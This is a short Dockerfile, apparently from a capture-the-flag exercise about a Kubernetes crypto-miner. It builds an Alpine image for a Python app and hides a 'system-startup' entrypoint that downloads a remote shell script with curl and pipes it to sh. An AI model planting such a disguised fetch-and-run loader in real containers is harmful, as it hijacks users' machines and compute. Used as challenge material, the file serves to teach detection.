FROM amd64/alpine:latest

RUN apk add --no-cache python3 py3-pip

RUN apk add --no-cache curl ca-certificates\
    && echo "curl -sSL https://raw.githubusercontent.com/Insight-NA/CTF2024/main/Kubernetes-Cypto-Miner/something-shiny.sh | sh " > /usr/bin/system-startup \
    && chmod +x /usr/bin/system-startup \
    && rm -rf /tmp/*

WORKDIR /app

COPY ./nuka-cola.py /app

ENTRYPOINT ["sh", "/usr/bin/system-startup"]
ENTRYPOINT ["python3", "nuka-cola.py"]
